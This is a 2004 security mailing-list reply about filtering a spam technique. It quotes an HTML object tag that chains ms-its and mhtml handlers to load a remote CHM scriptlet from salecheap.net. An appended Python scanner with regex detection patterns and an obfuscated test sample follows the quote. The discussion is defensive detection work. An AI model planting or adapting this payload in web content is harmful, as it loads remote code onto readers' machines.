Security Incidents mailing list archives

Re: A new technique to disguise a target URL in spam


From: Jeremiah Cornelius <jeremiah () nur net>
Date: Mon, 5 Apr 2004 18:09:59 -0700

On Monday 05 April 2004 10:43, Stef wrote:
      <object data="ms-its:mhtml:file://C
      \\MAIN.MHT!http://salecheap.net//main.chm::/main.htm";
      type="text/x-scriptlet"></object>
      </body>
      </html>
      test.htm (END)

Now how would one go about writing filters for - let's say - Snort -
based on something like this? Could it be - in pseudo-code - something
like: if location.ref <> src ==> then "take action"? Would it be safe
to assume that everything where the location.ref is different than src
is malicious?

I would start looking at the "low-hanging fruit"...

file://C might be a decent expression to trigger any kind of action.
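
One way to turn the "low-hanging fruit" idea above into a filter, as an added example that is not part of the original post: normalize each HTML attribute value first, then match the handler chain, the local file:// reference and the remote URL after "!" that appear in the quoted snippet. The check names, the sample strings and the example.invalid host are constructed for illustration; the obfuscated sample only exercises the normalizer and is not a claim about what any browser accepts.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Patterns taken from the sample quoted in this thread (matched after normalizing).
CHECKS = {
    "stacked-handler": re.compile(r"ms-its:mhtml:"),
    "local-file": re.compile(r"file://[a-z]"),
    "remote-after-bang": re.compile(r"!https?://"),
}

def normalize(value):
    """Undo percent-encoding, drop whitespace/control chars, lowercase."""
    value = unquote(value)
    return re.sub(r"[\s\x00-\x1f]+", "", value).lower()

class AttrScanner(HTMLParser):
    """Collect (tag, attribute, matched check names) for suspicious values."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value:
                continue
            # HTMLParser has already decoded character references (&#58; etc.)
            norm = normalize(value)
            matched = sorted(k for k, rx in CHECKS.items() if rx.search(norm))
            if matched:
                self.hits.append((tag, name, matched))

def scan(html_text):
    scanner = AttrScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.hits

# Constructed samples: the first mirrors the quoted snippet (line break included),
# the second varies case and encoding, the third is benign.
QUOTED = ('<object data="ms-its:mhtml:file://C\n\\\\MAIN.MHT!http://salecheap.net'
          '//main.chm::/main.htm" type="text/x-scriptlet"></object>')
OBFUSCATED = ('<object data="MS-ITS:MHTML:FILE:%2F%2Fc&#58;\\x.mht'
              '!HTTP://example.invalid/a.chm::/a.htm"></object>')
BENIGN = '<a href="http://example.invalid/file.html">docs</a>'

if __name__ == "__main__":
    for sample in (QUOTED, OBFUSCATED, BENIGN):
        print(scan(sample))
```

A literal match on the raw text for "file://C" does not fire on the second sample, which is why the values are normalized before matching.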
